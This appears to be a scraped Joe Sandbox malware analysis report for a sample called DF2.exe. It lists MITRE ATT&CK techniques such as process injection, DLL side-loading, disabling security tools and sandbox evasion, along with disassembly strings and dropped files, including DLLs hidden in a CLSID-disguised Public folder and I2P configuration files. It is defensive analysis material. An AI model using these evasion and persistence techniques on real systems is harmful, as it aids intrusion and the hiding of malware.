Strings

registry_del_value, xrefs: 00007FFE11508E40
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE11508E47

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 1001908780-1337547089
Opcode ID: 1a4c5cadb1a304fe19f32a0f991ee47209cd076bb84ff34595cdc3e7ee679b21
Instruction ID: b11ac48379e958cd5ce9ae7e093e5fe10037bef7f4b0d4bd4c721b2ccb2f3031
Opcode Fuzzy Hash: 1a4c5cadb1a304fe19f32a0f991ee47209cd076bb84ff34595cdc3e7ee679b21
Instruction Fuzzy Hash: 8EE09252E0CE0781E7119B87F80007D621CBB407A4F4400B9DE0E46670DE6CE984D241

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
Tactics:	Credential Access, Discovery
Data Sources:	Command: Command Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DF2.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_main.exe_59e5c191145a7e657df69e5cbadfff4911e783_61e28721_0a1493f8-80c0-4c5f-ae8c-b4c0afea8151\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3048.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3153.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3173.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3180.tmp.csv

C:\ProgramData\Microsoft\Windows\WER\Temp\WER31C0.tmp.txt

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\config.ini

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p.conf

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p.su3

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\gbchwntevtynyptbzxexwwype6ngdzwnhtbbsw3ct7bndroswrka.dat

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\jlia4ylyifgh3vywkvkvo5b742o6tqihkfgstsmtnikrkxwwmsma.dat

Windows Analysis Report
DF2.exe

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre